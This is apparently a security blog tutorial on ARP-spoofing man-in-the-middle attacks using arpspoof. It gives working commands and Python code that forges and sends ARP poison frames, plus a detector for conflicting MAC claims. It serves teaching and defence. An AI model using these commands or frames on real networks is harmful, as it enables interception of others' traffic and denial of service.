Man-In-The-Middle (MITM) with arpspoof

Apr 8, 2020 by Thibault Debatty

Offensive Security

https://cylab.be/blog/73/man-in-the-middle-mitm-with-arpspoof

In this post we show how to easily perform an L2 (ARP spoofing) man-in-the-middle attack using arpspoof on a standard Ubuntu computer...

Installation

To install arpspoof you actually have to install the dsniff package:

sudo apt install dsniff

And you are done...

Usage

Before using arpspoof, you need to activate packet forwarding in your kernel, so that the victim's packets that now arrive at your machine are relayed to the real gateway (and back). If you skip this step the victim simply loses connectivity, and the attack becomes a denial of service instead of an interception. Note that the setting is not persistent across reboots:

sudo sysctl net.ipv4.ip_forward=1

The classical way to use arpspoof is the following:

sudo arpspoof -i <interface> -t <target> -r <gateway>

where

  • interface is your network interface that arpspoof has to use
  • target is the IP address of the victim
  • gateway is the IP address of the default gateway on the network
  • -r is a flag (it takes no argument) indicating that arpspoof should poison both the target and the gateway, to capture traffic in both directions; the gateway is the positional host argument that follows it. Without -r only the target's ARP cache is poisoned and you only see the victim-to-gateway direction.

For this example, we want to capture the traffic between a victim on our network (IP 192.168.0.13) and the default gateway (IP 192.168.0.1). Hence we will collect all traffic between the victim and the internet...

Now is a good moment to start Wireshark on the same interface and begin capturing. To see only traffic related to the victim (and not our own traffic), we can use the following display filter in Wireshark:

ip.addr == 192.168.0.13

At first very few or no packets are captured (only broadcast traffic such as ARP requests: on a switched network the victim's unicast frames are not delivered to our port).

Now, in a terminal, let's start arpspoof:

sudo arpspoof -i enp0s3 -t 192.168.0.13 -r 192.168.0.1

After a few seconds, packets start to appear in Wireshark... We can now start analyzing the traffic between the victim and the internet! Keep in mind that this only exposes the content of unencrypted protocols (HTTP, DNS, FTP, ...); TLS traffic still goes through you but stays encrypted. When you stop arpspoof with Ctrl-C it sends correct ARP replies to both hosts to restore their caches, so do not kill it with SIGKILL or the victim will stay pointed at a MAC address that no longer forwards.
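As an added example (not code from the original post nor from dsniff itself), here is what arpspoof actually puts on the wire and the check a defender would run against a capture: a forged ARP reply built byte for byte (Ethernet + ARP, RFC 826), a parser for it, and a scan that flags any IP claimed by more than one MAC in the ARP replies seen on the segment. The gateway and victim IPs are the ones used above; the attacker IP 192.168.0.42 and all three MAC addresses are assumptions made up for the example. The send_frame() helper needs root and a Linux AF_PACKET socket and is not exercised by the built-in demo capture.

```python
import socket
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2

# Assumed addresses for the example (the IPs match the post, the MACs are made up).
GATEWAY_IP, GATEWAY_MAC = "192.168.0.1", "00:11:22:33:44:55"
VICTIM_IP, VICTIM_MAC = "192.168.0.13", "08:00:27:ab:cd:ef"
ATTACKER_IP, ATTACKER_MAC = "192.168.0.42", "08:00:27:12:34:56"


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet frame carrying the ARP reply "sender_ip is-at sender_mac",
    unicast to target_mac. This is the poison frame arpspoof repeats every
    couple of seconds: sender_ip is the address being hijacked, sender_mac is
    the attacker's, and the receiver overwrites its ARP cache entry on receipt."""
    ethernet = struct.pack("!6s6sH", mac_bytes(target_mac), mac_bytes(sender_mac), ETH_P_ARP)
    arp = struct.pack(
        "!HHBBH6s4s6s4s",
        1, 0x0800, 6, 4,           # HTYPE Ethernet, PTYPE IPv4, HLEN, PLEN
        ARP_REPLY,
        mac_bytes(sender_mac), socket.inet_aton(sender_ip),
        mac_bytes(target_mac), socket.inet_aton(target_ip),
    )
    return ethernet + arp            # 14 + 28 = 42 bytes before Ethernet padding


def parse_arp(frame):
    """Return the ARP fields of an Ethernet frame, or None if it is not ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    _, _, _, _, op, sha, spa, tha, tpa = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    return {
        "op": op,
        "sender_mac": mac_str(sha), "sender_ip": socket.inet_ntoa(spa),
        "target_mac": mac_str(tha), "target_ip": socket.inet_ntoa(tpa),
    }


def find_conflicts(frames):
    """The defender's check: map every IP to the set of MACs that claimed it in
    ARP replies. A poisoned segment shows the same IP bound to two MACs."""
    claims = {}
    for frame in frames:
        arp = parse_arp(frame)
        if arp and arp["op"] == ARP_REPLY:
            claims.setdefault(arp["sender_ip"], set()).add(arp["sender_mac"])
    return {ip: sorted(macs) for ip, macs in claims.items() if len(macs) > 1}


def poison_pair():
    """The two frames 'arpspoof -t VICTIM -r GATEWAY' keeps sending: the victim
    learns GATEWAY_IP at the attacker's MAC, the gateway learns VICTIM_IP there."""
    to_victim = build_arp_reply(ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    to_gateway = build_arp_reply(ATTACKER_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP)
    return to_victim, to_gateway


def send_frame(frame, iface):
    """Put a raw frame on the wire (Linux only, needs CAP_NET_RAW / root).
    Not exercised by demo_capture(); shown so the poison frame is usable."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ARP)) as sock:
        sock.bind((iface, 0))
        sock.send(frame)


def demo_capture():
    """Constructed capture: two legitimate replies, then the poison pair."""
    legit_gw = build_arp_reply(GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    legit_victim = build_arp_reply(VICTIM_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP)
    return [legit_gw, legit_victim, *poison_pair()]


if __name__ == "__main__":
    for ip, macs in find_conflicts(demo_capture()).items():
        print(f"{ip} claimed by {macs}")
```

Running the module prints both 192.168.0.1 and 192.168.0.13 as claimed by two MACs, which is exactly the "flip flop" pattern tools such as arpwatch alert on, and what you see in Wireshark as "duplicate use of 192.168.0.1 detected" once arpspoof is running.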
